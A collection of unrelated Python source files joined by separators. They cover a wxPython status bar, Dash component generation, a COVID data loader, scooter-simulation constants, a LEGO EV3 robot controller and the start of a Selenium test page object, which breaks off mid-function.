self.LayoutWidgets()
return
if conn.connect_time:
if not self.conn_time.GetToolTip():
conn_time = time.localtime(conn.connect_time)
self.conn_time.SetToolTip(time.strftime('Connected since: %c', conn_time))
ctime = time.time() - conn.connect_time
dd, rest = divmod(ctime, 3600 * 24)
hh, rest = divmod(rest, 3600)
mm, ss = divmod(rest, 60)
conn_time_str = '%02d:%02d:%02d:%02d' % (dd, hh, mm, ss)
else:
conn_time_str = '--:--:--:--'
self.conn_time.SetLabel(conn_time_str)
def LayoutWidgets(self):
# calculate a reasonable size for "connected time"
self.conn_time.SetLabel('00:00:00:00')
conn_time_size = self.conn_time.GetClientSize()
self.conn_time.SetLabel('')
# Iterate the features, add icons
for f, i in self.feature_icons.items():
i.Show(True if f in self.connection.features else False)
self.feature_tray.Fit()
self.SetStatusWidths(
[-1, # status pane
self.feature_tray.GetSize().width, # feature icons
conn_time_size.Width + 3, # conn timer
self.GetSize().height + 2, # status light
12, # activity blinker
self.GetSize().height + 2, # placeholder
])
self.OnSize(None)
def AddStatus(self, status):
self.SetStatusText(status, 2)
if self.status_timer:
if self.status_timer.IsRunning():
self.status_timer.Restart(10000)
self.status_timer = wx.CallLater(10000, self.ClearStatus)
def ClearStatus(self):
self.SetStatusText('', 2)
def StartBlinker(self):
if self.blinker_timer and self.blinker_timer.IsRunning(): return
new_bg = (wx.RED if self.activity_blinker.GetBackgroundColour() != wx.RED else None)
self.activity_blinker.SetBackgroundColour(new_bg)
self.activity_blinker.Refresh()
self.activity_blinker.SetToolTip("New text has arrived")
self.blinker_timer = wx.CallLater(1000, self.StartBlinker)
def StopBlinker(self):
if self.blinker_timer and self.blinker_timer.IsRunning():
self.blinker_timer.Stop()
self.activity_blinker.SetBackgroundColour(None)
self.activity_blinker.SetToolTip(None)
class FeatureIcon(wx.Panel):
def __init__(self, parent, i, w):
wx.Panel.__init__(self, parent)
wx.StaticBitmap(self, -1, w)
self.SetToolTip(i + " enabled")
# Bind mouse events to the bitmaps inside the panel, add "hand" cursor
def Bind(self, evt, handler):
if evt == wx.EVT_LEFT_UP:
self.SetCursor(wx.Cursor(wx.CURSOR_HAND))
for c in self.GetChildren():
c.Bind(evt, handler)
super(FeatureIcon, self).Bind(evt, handler)
|
#!/bin/python
import sys
if "recent_outputs" in sys.argv[1]:
import mine.generate_gallery
mine.generate_gallery(sys.argv[1])
else:
print ("special_execute does not know how to handle ", sys.argv[1])
|
import collections
import copy
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
class Component(collections.MutableMapping):
def __init__(self, **kwargs):
for k, v in list(kwargs.items()):
if k not in self._prop_names:
# TODO - What's the right exception here?
raise Exception(
'Unexpected keyword argument `{}`'.format(k) +
'\nAllowed arguments: {}'.format(
', '.join(sorted(self._prop_names))
)
)
setattr(self, k, v)
def to_plotly_json(self):
as_json = {
'props': {p: getattr(self, p)
for p in self._prop_names
if hasattr(self, p)},
'type': self._type,
'namespace': self._namespace
}
return as_json
def _check_if_has_indexable_children(self, item):
if (not hasattr(item, 'children') or
(not isinstance(item.children, Component) and
not isinstance(item.children, collections.MutableSequence))):
raise KeyError
def _get_set_or_delete(self, id, operation, new_item=None):
self._check_if_has_indexable_children(self)
if isinstance(self.children, Component):
if getattr(self.children, 'id', None) is not None:
# Woohoo! It's the item that we're looking for
if self.children.id == id:
if operation == 'get':
return self.children
elif operation == 'set':
self.children = new_item
return
elif operation == 'delete':
self.children = None
return
# Recursively dig into its subtree
try:
if operation == 'get':
return self.children.__getitem__(id)
elif operation == 'set':
self.children.__setitem__(id, new_item)
return
elif operation == 'delete':
self.children.__delitem__(id)
return
except KeyError:
pass
# if children is like a list
if isinstance(self.children, collections.MutableSequence):
for i, item in enumerate(self.children):
# If the item itself is the one we're looking for
if getattr(item, 'id', None) == id:
if operation == 'get':
return item
elif operation == 'set':
self.children[i] = new_item
return
elif operation == 'delete':
del self.children[i]
return
# Otherwise, recursively dig into that item's subtree
# Make sure it's not like a string
elif isinstance(item, Component):
try:
if operation == 'get':
return item.__getitem__(id)
elif operation == 'set':
item.__setitem__(id, new_item)
return
elif operation == 'delete':
item.__delitem__(id)
return
except KeyError:
pass
# The end of our branch
# If we were in a list, then this exception will get caught
raise KeyError(id)
# Supply ABC methods for a MutableMapping:
# - __getitem__
# - __setitem__
# - __delitem__
# - __iter__
# - __len__
def __getitem__(self, id):
"""Recursively find the element with the given ID through the tree
of children.
"""
# A component's children can be undefined, a string, another component,
# or a list of components.
return self._get_set_or_delete(id, 'get')
def __setitem__(self, id, item):
"""Set an element by its ID."""
return self._get_set_or_delete(id, 'set', item)
def __delitem__(self, id):
"""Delete items by ID in the tree of children."""
return self._get_set_or_delete(id, 'delete')
def traverse(self):
"""Yield each item in the tree."""
children = getattr(self, 'children', None)
# children is just a component
if isinstance(children, Component):
yield children
for t in children.traverse():
yield t
# children is a list of components
elif isinstance(children, collections.MutableSequence):
for i in children:
yield i
if isinstance(i, Component):
for t in i.traverse():
yield t
def __iter__(self):
"""Yield IDs in the tree of children."""
for t in self.traverse():
if (isinstance(t, Component) and
getattr(t, 'id', None) is not None):
yield t.id
def __len__(self):
"""Return the number of items in the tree."""
# TODO - Should we return the number of items that have IDs
# or just the number of items?
# The number of items is more intuitive but returning the number
# of IDs matches __iter__ better.
length = 0
if getattr(self, 'children', None) is None:
length = 0
elif isinstance(self.children, Component):
length = 1
length += len(self.children)
elif isinstance(self.children, collections.MutableSequence):
for c in self.children:
length += 1
if isinstance(c, Component):
length += len(c)
else:
# string or number
length = 1
return length
def generate_class(typename, props, description, namespace):
# Dynamically generate classes to have nicely formatted docstrings,
# keyword arguments, and repr
# Insired by http://jameso.be/2013/08/06/namedtuple.html
# TODO - Tab out the repr for the repr of these components to make it
# look more like a heirarchical tree
# TODO - Include "description" "defaultValue" in the repr and docstring
#
# TODO - Handle "required"
#
# TODO - How to handle user-given `null` values? I want to include
# an expanded docstring like Dropdown(value=None, id=None)
# but by templating in those None values, I have no way of knowing
# whether a property is None because the user explicitly wanted
# it to be `null` or whether that was just the default value.
# The solution might be to deal with default values better although
# not all component authors will supply those.
c = '''class {typename}(Component):
"""{docstring}
"""
def __init__(self, {default_argtext}):
self._prop_names = {list_of_valid_keys}
self._type = '{typename}'
self._namespace = '{namespace}'
self.available_events = {events}
self.available_properties = {list_of_valid_keys}
for k in {required_args}:
if k not in kwargs:
raise Exception(
'Required argument `' + k + '` was not specified.'
)
super({typename}, self).__init__({argtext})
def __repr__(self):
if(any(getattr(self, c, None) is not None for c in self._prop_names
if c is not self._prop_names[0])):
return (
'{typename}(' +
', '.join([c+'='+repr(getattr(self, c, None))
for c in self._prop_names
if getattr(self, c, None) is not None])+')')
else:
return (
'{typename}(' +
repr(getattr(self, self._prop_names[0], None)) + ')')
'''
filtered_props = reorder_props(filter_props(props))
list_of_valid_keys = repr(list(filtered_props.keys()))
docstring = create_docstring(
typename,
filtered_props,
parse_events(props),
description
)
events = '[' + ', '.join(parse_events(props)) + ']'
if 'children' in props:
default_argtext = 'children=None, **kwargs'
argtext = 'children=children, **kwargs'
else:
default_argtext = '**kwargs'
argtext = '**kwargs'
required_args = required_props(props)
d = c.format(**locals())
scope = {'Component': Component}
exec(d, scope)
result = scope[typename]
return result
def required_props(props):
return [prop_name for prop_name, prop in list(props.items())
if prop['required']]
def reorder_props(props):
# If "children" is a prop, then move it to the front to respect
# dash convention
if 'children' in props:
props = collections.OrderedDict(
[('children', props.pop('children'), )] +
list(zip(list(props.keys()), list(props.values())))
)
return props
def parse_events(props):
if ('dashEvents' in props and
props['dashEvents']['type']['name'] == 'enum'):
events = [v['value'] for v in props['dashEvents']['type']['value']]
else:
events = []
return events
def create_docstring(name, props, events, description):
if 'children' in props:
props = collections.OrderedDict(
[['children', props.pop('children')]] +
list(zip(list(props.keys()), list(props.values())))
)
return '''A {name} component.{description}
Keyword arguments:
{args}
Available events: {events}'''.format(
name=name,
description='\n{}'.format(description),
args='\n'.join(
['- {}'.format(argument_doc(
p, prop['type'], prop['required'], prop['description']
)) for p, prop in list(filter_props(props).items())]
),
events=', '.join(events)
).replace(' ', '')
def filter_props(args):
filtered_args = copy.deepcopy(args)
for arg_name, arg in list(filtered_args.items()):
if 'type' not in arg:
filtered_args.pop(arg_name)
continue
arg_type = arg['type']['name']
if arg_type in ['func', 'symbol', 'instanceOf']:
filtered_args.pop(arg_name)
# dashEvents are a special oneOf property that is used for subscribing
# to events but it's never set as a property
if arg_name in ['dashEvents']:
filtered_args.pop(arg_name)
return filtered_args
def js_to_py_type(type_object):
js_type_name = type_object['name']
# wrapping everything in lambda to prevent immediate execution
js_to_py_types = {
'array': lambda: 'list',
'bool': lambda: 'boolean',
'number': lambda: 'number',
'string': lambda: 'string',
'object': lambda: 'dict',
'any': lambda: 'boolean | number | string | dict | list',
'element': lambda: 'dash component',
'node': lambda: (
'a list of or a singular dash component, string or number'
),
# React's PropTypes.oneOf
'enum': lambda: 'a value equal to: {}'.format(', '.join([
'{}'.format(str(t['value'])) for t in type_object['value']
])),
# React's PropTypes.oneOfType
'union': lambda: '{}'.format(' | '.join([
'{}'.format(js_to_py_type(subType))
for subType in type_object['value'] if js_to_py_type(subType) != ''
])),
# React's PropTypes.arrayOf
'arrayOf': lambda: 'list'.format(
'of {}s'.format(js_to_py_type(type_object['value']))
if js_to_py_type(type_object['value']) != ''
else ''
),
# React's PropTypes.objectOf
'objectOf': lambda: (
'dict with strings as keys and values of type {}'
).format(js_to_py_type(type_object['value'])),
# React's PropTypes.shape
'shape': lambda: (
'dict containing keys {}.\n{}'.format(
', '.join(
["'{}'".format(t) for t in
list(type_object['value'].keys())]
),
'Those keys have the following types: \n{}'.format(
'\n'.join([
' - ' + argument_doc(
prop_name,
prop,
prop['required'],
prop.get('description', '')
) for
prop_name, prop in list(type_object['value'].items())
])
)
)
)
}
if 'computed' in type_object and type_object['computed']:
return ''
if js_type_name in js_to_py_types:
return js_to_py_types[js_type_name]()
else:
return ''
def argument_doc(arg_name, type_object, required, description):
py_type_name = js_to_py_type(type_object)
if '\n' in py_type_name:
return (
'{name} ({is_required}): {description}. '
'{name} has the following type: {type}'
).format(
name=arg_name,
type=py_type_name,
description=description,
is_required='required' if required else 'optional'
)
else:
return '{name} ({type}{is_required}){description}'.format(
name=arg_name,
type='{}; '.format(py_type_name) if py_type_name else '',
description=(
': {}'.format(description) if description != '' else ''
),
is_required='required' if required else 'optional'
)
|
import sqlite3
import json
import os
import requests
#Database setup
def setUpDatabase(db_name):
''' This function sets up a database. It will return a cursor and connector. '''
path = os.path.dirname(os.path.abspath(__file__))
conn = sqlite3.connect(path+'/'+ db_name)
cur = conn.cursor()
return cur, conn
def create_month_table(cur, conn):
''' This function takes in cursor and connector (cur and conn) and creates a table within the
database that has the name of the month. This function will be used to retrive the name of the month and
insert it into the death table to allow for easier calculations. '''
cur.execute('CREATE TABLE Months (key TEXT PRIMARY KEY, month_name TEXT)')
i = 1
monthLst = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
while i <= 12:
for month in monthLst:
if len(str(i)) == 1:
new = '0' + str(i)
else:
new = str(i)
cur.execute("INSERT INTO Months (key, month_name) VALUES (?, ?)", (new, month))
i += 1
conn.commit()
def create_death_table(cur, conn):
''' This function takes in cur and conn as parameters and creates the table for COVID
death data (total deaths and new deaths confirmed), located in the database. '''
cur.execute('CREATE TABLE IF NOT EXISTS DEATH (key TEXT PRIMARY KEY, date TEXT UNIQUE, month TEXT, death INTEGER, deathConfirmed)')
conn.commit()
def get_data():
''' This function creates the URL for the API request. It requires information on
the state- michigan (in the US) for which data will be gathered. It returns the data. '''
base_url = "https://api.covidtracking.com/v1/states/mi/daily.json"
r = requests.get(base_url)
data = json.loads(r.text)
return data
def add_to_death_table(cur,conn,lst):
''' This function creates a list of strings for months May - October.
This function loops adds the necessary data to the Death table. For each date in the time period,
it adds a key, date (2020MONTHDAY), individual months (May- October), total deaths in michigan to date, and new confirmed deaths in michigan to date.
This function adds 25 unique pieces of data into the table at a time. '''
stringLst = ["05", "06", "07","08","09","10"]
cur.execute('SELECT COUNT(*) FROM DEATH')
rows = cur.fetchone()[0]
final = rows + 25
for i in range(len(lst)):
if rows < final and rows <= len(lst):
if str(lst[i]["date"])[4:6] in stringLst:
deathConfirmed = lst[i]["deathConfirmed"]- lst[i + 1]["deathConfirmed"]
totalDeath = lst[i]["death"]
date = lst[i]["date"]
cur.execute('SELECT month_name FROM Months WHERE key = ?', (str(date)[4:6],))
month = cur.fetchone()[0]
cur.execute("INSERT OR IGNORE INTO DEATH (key, date, month, death, deathConfirmed) VALUES (?, ?, ?, ?, ?)",
(rows, date, month, totalDeath, deathConfirmed))
cur.execute('SELECT COUNT(*) FROM DEATH')
rows = cur.fetchone()[0]
i = i + 1
conn.commit()
def keep_running(cur, conn, lst):
''' This function asks the user if they would like to add the next 25 rows
to the table. If the user inputs no, it ends the program. If the user inputs
yes, it adds the next 25 unique rows of data, and asks if it should input 25 more. When
there is no more data to input, the program prints "Data input complete" and exits the
program. '''
x = input("Would you like to add 25 rows? Please enter 'yes' or 'no'.")
while x != 'no':
cur.execute('SELECT COUNT(*) FROM DEATH')
row = cur.fetchone()[0]
if row + 25 > 185:
add_to_death_table(cur, conn, lst)
print("Data input complete")
break
else:
add_to_death_table(cur, conn, lst)
x = input("Would you like to add 25 rows? Please enter 'yes' or 'no'.")
def main():
''' This function sets up the database and tables, stores information in dictionary,
loops through dictionary and adds appropriate data to death table, 25 unique items at a time. '''
# SETUP DATABASE AND TABLE
cur, conn = setUpDatabase('covid_tracking.db')
#create_month_table(cur, conn)
create_death_table(cur, conn)
lst = get_data()
#add_to_death_table(cur,conn,lst)
keep_running(cur,conn,lst)
if __name__ == "__main__":
main()
|
import os
GEOSPATIAL_BOUND = (59.9112, 59.9438, 10.7027, 10.7772)
GEOSPATIAL_BOUND_NEW = (59.9040, 59.9547, 10.6478, 10.8095)
MAX_DISTANCE = 12
CLUSTER_CENTER_DELTA = 0.01
# Colors for visualizer
BLUE, GREEN, RED, BLACK, WHITE = "blue", "green", "red", "black", "white"
# Speed of service vehicles
VEHICLE_SPEED = 30
MINUTES_IN_HOUR = 60
# Inventory of vehicle
BATTERY_INVENTORY = 50
SCOOTER_INVENTORY = 20
# Depot parameters
MAIN_DEPOT_LOCATION = (59.931794, 10.788314)
SMALL_DEPOT_LOCATIONS = [(59.908009, 10.741604), (59.944473, 10.748624)]
MAIN_DEPOT_CAPACITY = 10000
SMALL_DEPOT_CAPACITY = 100
CHARGE_TIME_PER_BATTERY = 60
SWAP_TIME_PER_BATTERY = 0.4
# Speed of scooter ref - Fearnley at al. (2020, section 3.6)
SCOOTER_SPEED = 7
# Default simulation constants
ITERATION_LENGTH_MINUTES = 20
NUMBER_OF_ROLLOUTS = 50
BATTERY_LIMIT = 20.0
DISCOUNT_RATE = 0.80
# Negative reward for lost trips
LOST_TRIP_REWARD = -0.1
# Testing parameters
NUMBER_OF_NEIGHBOURS = 3
SHIFT_DURATION = 300
SAMPLE_SIZE = 500
NUMBER_OF_CLUSTERS = 30
# different policies: "RandomRolloutPolicy", "SwapAllPolicy"
POLICIES = ["RandomRolloutPolicy", "SwapAllPolicy"]
STATE_CACHE_DIR = "test_state_cache"
# Test data directory
TEST_DATA_DIRECTORY = "test_data"
# RUNTIME SETTINGS
SEED = 69
# Visualization parameters
ACTION_OFFSET = 0.018
COLORS = [
"#B52CC2",
"#EF9A90",
"#43C04E",
"#CDCAE9",
"#C00283",
"#02BE50",
"#D69F94",
"#A4847E",
"#CE058B",
"#39029A",
"#9EEB33",
"#056672",
"#FC726E",
"#8C109C",
"#D8FB27",
"#BBE5D1",
"#FEEB81",
"#126027",
"#7666E7",
"#530788",
"#A281ED",
"#954701",
"#B42760",
"#F0E466",
"#A32315",
"#4886E8",
"#117427",
"#A3A66A",
"#F124AC",
"#4572BD",
"#93EB5F",
"#ECDCCD",
"#48317F",
"#DF8547",
"#1DE961",
"#5BD669",
"#4FAA9B",
"#937016",
"#840FF6",
"#3EAEFD",
"#F6F34D",
"#015133",
"#59025B",
"#F03B29",
"#53A912",
"#34058C",
"#FA928D",
"#3C70C3",
"#AB9869",
"#B6BD37",
"#693C24",
"#2588F7",
"#54B006",
"#6604CE",
"#4A4329",
"#0175B1",
"#177982",
"#544FAD",
"#DD5409",
"#583ED1",
"#CD9D69",
"#6B0BCE",
"#D14B12",
"#96725D",
"#BB137F",
"#7B53B5",
"#BFFB24",
"#F9D08F",
"#CF03B8",
"#A6F591",
"#D7CFDB",
"#2D4AD6",
"#BC5286",
"#6245C8",
"#E40EB7",
"#E2DA97",
"#EE5089",
"#CAF026",
"#668981",
"#8E424B",
"#49633D",
"#8A4CE4",
"#827C33",
"#35EFF2",
"#325041",
"#2BC23F",
"#44857A",
"#DA0043",
"#87A43F",
"#D4FCEC",
"#9FD87C",
"#0D36DF",
"#241B73",
"#524526",
"#163F53",
"#4C9B58",
"#00F4DB",
"#20054B",
"#82026F",
"#CA561D",
"#F94B06",
"#5CCBDB",
"#8B6882",
"#9C28B0",
"#15357B",
"#BB00F4",
"#451918",
"#B94AE1",
"#698290",
"#415697",
"#61B95D",
"#957BD8",
"#01A1C5",
"#69E54F",
"#D40C21",
"#08A810",
"#05ECC3",
"#8FA2B5",
"#D45A2C",
"#1689EA",
"#7DD21F",
"#A615B6",
"#430E4C",
"#557F16",
"#68E3A4",
"#E19180",
"#8B0197",
"#7314C4",
"#A397DA",
"#175ACE",
"#6185AD",
"#D981A8",
"#984ED3",
"#37FFF0",
"#90BB50",
"#A818B0",
"#28F263",
"#700EA8",
"#5C0D3A",
"#CAF06F",
"#815F36",
"#CCF509",
"#21C91D",
"#D09B45",
"#282AF6",
"#053525",
"#0FAE75",
"#213E02",
"#1572AA",
"#9D9A3A",
"#1C1DA9",
"#C6A728",
"#0BE59B",
"#272CAF",
"#75BA93",
"#E29981",
"#45F101",
"#D8BA19",
"#BF7545",
"#0F85B1",
"#E6DC7B",
"#6B6548",
"#78B075",
"#AFDF4D",
"#D0BD94",
"#C6F81B",
"#27C209",
"#3C6574",
"#2CE0B3",
"#9C6E06",
"#53CECD",
"#A5EC06",
"#AA83D6",
"#7705D2",
"#806015",
"#881E9E",
"#617730",
"#1F9ACF",
"#8AE30F",
"#D1E1B4",
"#D924F6",
"#5FE267",
"#6BDDF2",
"#5E40A5",
"#9B1580",
"#B6E49C",
"#619C46",
"#504BDE",
]
|
from .authorization_handler import AuthorizationHandler
from .db_session_manager import DBSessionManager
from .json_decoder import JSONDecoder
|
#!/usr/bin/env python3
from ev3dev2.motor import MoveSteering, MoveTank, MediumMotor, LargeMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D
from ev3dev2.sensor.lego import TouchSensor, ColorSensor, GyroSensor
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2.button import Button
import xml.etree.ElementTree as ET
import threading
import time
from sys import stderr
import os
# import the functions
from functions.Do_nothing import Do_nothing
from functions.off import off
from functions.Delay_seconds import Delay_seconds
from functions.Motor_onForRotations import Motor_onForRotations
from functions.Motor_onForSeconds import Motor_onForSeconds
from functions.Steering_rotations import Steering_rotations
from functions.Steering_seconds import Steering_seconds
from functions.Tank_rotations import Tank_rotations
from functions.Tank_seconds import Tank_seconds
from functions.Reset_gyro import Reset_gyroo
from functions.StraightGyro_target import StraightGyro_target
from functions.StraightGyro_current import StraightGyro_current
from functions.StraightGyro_target_toLine import StraightGyro_target_toLine
from functions.StraightGyro_current_toLine import StraightGyro_current_toLine
from functions.StraightGyro_target_colourStop import StraightGyro_target_colourStop
from functions.Turn_degrees import Turn_degrees
from functions.Turn_from_start_position import Turn_from_start_position
from functions.BlackLine_rotations import BlackLine_rotations
from functions.squareOnLine import squareOnLine
from functions.squareOnLineWhite import squareOnLineWhite
# define the different sensors, motors and motor blocks
button = Button()
colourAttachment = ColorSensor(INPUT_4)
colourLeft = ColorSensor(INPUT_3)
colourRight = ColorSensor(INPUT_2)
gyro = GyroSensor(INPUT_1)
largeMotor_Left= LargeMotor(OUTPUT_B)
largeMotor_Right= LargeMotor(OUTPUT_C)
mediumMotor = MediumMotor(OUTPUT_D)
steering_drive = MoveSteering(OUTPUT_B, OUTPUT_C)
tank_block = MoveTank(OUTPUT_B, OUTPUT_C)
# check if the key has been removed
def isKeyTaken(rProgram, gProgram, bProgram):
# return True if the key was removed and stop the motors
rbgA = colourAttachment.raw
# compare the current values to the values shown when the key is inserted
# (rgb values are 50, 62, 57 when the slot is empty)
return abs(rbgA[0] - rProgram) > 12 and abs(rbgA[1] - gProgram) > 12 and abs(rbgA[2] - bProgram) > 12 #returns which run to run
# calibrate the colourAttachment values for the different keys
def colourAttachment_values():
stop = False
# set a larger font
os.system('setfont Lat15-TerminusBold14') # os.system('setfont Lat15-TerminusBold32x16')
# print instructions and collect the rgb values for each key
print('Insert red', file=stderr)
print('Insert red')
button.wait_for_pressed(['enter'])
red = colourAttachment.raw
print('Next.')
print('Insert green', file=stderr)
print('Insert green')
button.wait_for_pressed(['enter'])
green = colourAttachment.raw
print('Next.')
print('Insert white', file=stderr)
print('Insert white')
button.wait_for_pressed(['enter'])
white = colourAttachment.raw
print('Next.')
print('Insert black', file=stderr)
print('Insert black')
button.wait_for_pressed(['enter'])
black = colourAttachment.raw
print('Next.')
print('Insert yellow', file=stderr)
print('Insert yellow')
button.wait_for_pressed(['enter'])
yellow = colourAttachment.raw
print('Next.')
print('Insert blue', file=stderr)
print('Insert blue')
button.wait_for_pressed(['enter'])
blue = colourAttachment.raw
print('Done!')
button.wait_for_pressed(['enter'])
# return the values for the different keys
attachment_values = [red, green, white, black, yellow, blue]
return attachment_values
# launch actions using threads
def launchStep(stop, action):
# compare the 'name' to the functions and start a thread with the matching function
# return the thread to be added to the threadPool
name = action.get('action')
if name == 'Do_nothing': # (stop)
print("Do_nothing", file= stderr)
thread = threading.Thread(target=Do_nothing, args=(stop,))
thread.start()
return thread
if name == 'off': # ()
print("Motors off", file=stderr)
thread = threading.Thread(target=off)
thread.start()
return thread
if name == 'Delay_seconds': # (stop, seconds)
print("Starting Delay_seconds", file=stderr)
seconds = float(action.get('seconds'))
thread = threading.Thread(target=Delay_seconds, args=(stop, seconds))
thread.start()
return thread
if name == 'Motor_onForRotations': # (stop, motor, speed, rotations, gearRatio)
print("Starting Motor_onForRotations", file=stderr)
motor = action.get('motor')
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
gearRatio = float(action.get('gearRatio'))
if (motor == "largeMotor_Left"):
motorToUse = largeMotor_Left
if (motor == "largeMotor_Right"):
motorToUse = largeMotor_Right
if (motor == "mediumMotor"):
motorToUse = mediumMotor
thread = threading.Thread(target=Motor_onForRotations, args=(stop, motorToUse, speed, rotations, gearRatio))
thread.start()
return thread
if name == 'Motor_onForSeconds': # (stop, motor, speed, seconds)
print("Starting Motor_onForSeconds", file=stderr)
motor = action.get('motor')
speed = float(action.get('speed'))
seconds = float(action.get('seconds'))
if (motor == "largeMotor_Left"):
motorToUse = largeMotor_Left
if (motor == "largeMotor_Right"):
motorToUse = largeMotor_Right
if (motor == "mediumMotor"):
motorToUse = mediumMotor
thread = threading.Thread(target=Motor_onForSeconds,args=(stop, motorToUse, speed, seconds))
thread.start()
return thread
if name == 'Steering_rotations': # (stop, speed, rotations, steering)
print("Starting Steering_rotations", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
steering = float(action.get('steering'))
brake = bool(action.get('brake'))
thread = threading.Thread(target=Steering_rotations, args=(stop, speed, rotations, steering))
thread.start()
return thread
if name == 'Steering_seconds': # (stop, speed, seconds, steering)
print("Starting Steering_seconds", file=stderr)
speed = float(action.get('speed'))
seconds = float(action.get('seconds'))
steering = float(action.get('steering'))
thread = threading.Thread(target=Steering_seconds, args= (stop, speed, steering))
thread.start()
return thread
if name == 'Tank_rotations': # (stop, left_speed, right_speed, rotations)
print("Starting Tank_rotations", file=stderr)
left_speed = float(action.get('left_speed'))
right_speed = float(action.get('right_speed'))
rotations = float(action.get('rotations'))
thread = threading.Thread(target = Tank_rotations, args=(stop, left_speed, right_speed, rotations))
thread.start()
return thread
if name == 'Tank_seconds': # (stop, left_speed, right_speed, seconds)
print("Starting Tank_seconds", file=stderr)
left_speed = float(action.get('left_speed'))
right_speed = float(action.get('right_speed'))
seconds = float(action.get('seconds'))
thread = threading.Thread(target = Tank_seconds, args=(stop, left_speed, right_speed, seconds))
thread.start()
return thread
if name == 'Reset_gyro': # ()
print("Starting Reset_gyro", file=stderr)
thread = threading.Thread(target=Reset_gyro)
thread.start()
return thread
if name == 'StraightGyro_target': # (stop, speed, rotations, target)
print("Starting StraightGyro_target", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
target = float(action.get('target'))
thread = threading.Thread(target=StraightGyro_target, args=(stop, speed, rotations, target))
thread.start()
return thread
if name == 'StraightGyro_target_colourStop': # (stop, speed, target, sensor, value)
print("Starting StraightGyro_target_colourStop", file=stderr)
speed = float(action.get('speed'))
target = float(action.get('target'))
sensor = action.get('sensor')
value = float(action.get('value'))
thread = threading.Thread(target=StraightGyro_target_colourStop, args=(stop, speed, target, sensor, value))
thread.start()
return thread
if name == 'StraightGyro_current': # (stop, speed, rotations)
print("Starting StraightGyro_current", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
thread = threading.Thread(target=StraightGyro_current, args=(stop, speed, rotations))
thread.start()
return thread
if name == 'StraightGyro_target_toLine': # (stop, speed, rotations, target, whiteOrBlack)
print("Starting StraightGyro_target", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
target = float(action.get('target'))
whiteOrBlack = action.get('whiteOrBlack')
thread = threading.Thread(target=StraightGyro_target_toLine, args=(stop, speed, rotations, target, whiteOrBlack))
thread.start()
return thread
if name == 'StraightGyro_current_toLine': # (stop, speed, rotations, whiteOrBlack)
print("Starting StraightGyro_current", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
whiteOrBlack = action.get('whiteOrBlack')
thread = threading.Thread(target=StraightGyro_current_toLine, args=(stop, speed, rotations, whiteOrBlack))
thread.start()
return thread
if name == 'Turn_degrees': # (stop, speed, degrees)
print("Starting Turn_degrees", file=stderr)
speed = float(action.get('speed'))
degrees = float(action.get('degrees'))
thread = threading.Thread(target = Turn_degrees, args=(stop, speed, degrees))
thread.start()
return thread
if name == 'Turn_from_start_position': # (stop, speed, degrees)
print('Starting Turn_from_start_position', file=stderr)
speed = float(action.get('speed'))
degrees = float(action.get('degrees'))
thread = threading.Thread(target = Turn_from_start_position, args=(stop, speed, degrees))
thread.start()
return thread
if name == 'squareOnLine': # (stop, speed, target)
print("Starting squareOnLine", file=stderr)
speed = float(action.get('speed'))
target = float(action.get('target'))
thread = threading.Thread(target=squareOnLine, args=(stop, speed, target))
thread.start()
return thread
if name == 'squareOnLineWhite': # (stop, speed, target)
print("Starting squareOnLine White", file=stderr)
speed = float(action.get('speed'))
target = float(action.get('target'))
thread = threading.Thread(target=squareOnLine, args=(stop, speed, target))
thread.start()
return thread
if name == 'Blacklinetestinghome': # (stop, speed, correction)
print("Blackline testing home", file=stderr)
speed = float(action.get('speed'))
correction = float(action.get('correction'))
thread = threading.Thread(target = Blacklinetestinghome, args=(stop, speed, rotations, sensor, lineSide, correction))
thread.start()
return thread
# main section of the program
def main():
# create dictionaries and variables
threadPool = []
actions = []
stopProcessing = False
# open and read the overall XML file
programXML = ET.parse('overall_programming.xml')
programs = programXML.getroot()
attachment_values = colourAttachment_values()
while True:
# reset stopProcessing each repetition
stopProcessing = False
# collect the raw rgb light values from colourAttachment and the overall XML file
rgb = colourAttachment.raw
for program in programs:
programName = program.get('name')
colourValue = int(program.get('colourValue'))
# use the calibrated values in comparison
colourProgram = attachment_values[colourValue]
rProgram = colourProgram[0]
gProgram = colourProgram[1]
bProgram = colourProgram[2]
rColourSensor = rgb[0]
gColourSensor = rgb[1]
bColourSensor = rgb[2]
# compare the sets of values
# if the values match, run the corresponding program
if abs(rColourSensor - rProgram) < 12 and abs(gColourSensor - gProgram) < 12 and abs(bColourSensor - bProgram) < 12:
mediumMotor.reset
# read the relevant program XML
fileName = program.get('fileName')
print(fileName,file=stderr)
dataXML = ET.parse(fileName)
steps = dataXML.getroot()
# run each step individually unless they are run in parallel
for step in steps:
action = step.get('action')
# loop through actions that should be run in parallel
if action == 'launchInParallel':
for subSteps in step:
thread = launchStep(lambda:stopProcessing, subSteps)
threadPool.append(thread)
# run each action that isn't run in parrallel idividually
else:
thread = launchStep(lambda:stopProcessing, step)
threadPool.append(thread)
while not stopProcessing:
# if there are no threads running start the next action
if not threadPool:
break
# remove any completed threads from the pool
for thread in threadPool:
if not thread.isAlive():
threadPool.remove(thread)
# if the robot has been lifted or t=
# '?e key removed then stop everything
if isKeyTaken(rProgram, gProgram, bProgram):
stopProcessing = True
break
# if the 'stopProcessing' flag has been set then finish the whole loop
if stopProcessing:
off()
break
main()
|
__author__ = 'avasilyev2'
from selenium.webdriver.common.by import By
import selenium
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.keys import Keys
import time
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.action_chains import ActionChains
import db_work
class BasePage(object):
def __init__(self, driver):
self.driver = driver
self.wait = WebDriverWait(self.driver, 10)
class CatalogPage(BasePage):
def hover(self, element):
element_to_show_tooltip = element.find_element_by_class_name("img")
hov = ActionChains(self.driver).move_to_element(element_to_show_tooltip)
hov.perform()
text = self.driver.find_element_by_xpath('//*[@id="tooltip"]/h3').get_attribute('textContent')
return text
def check_if_available(self, prod):
try:
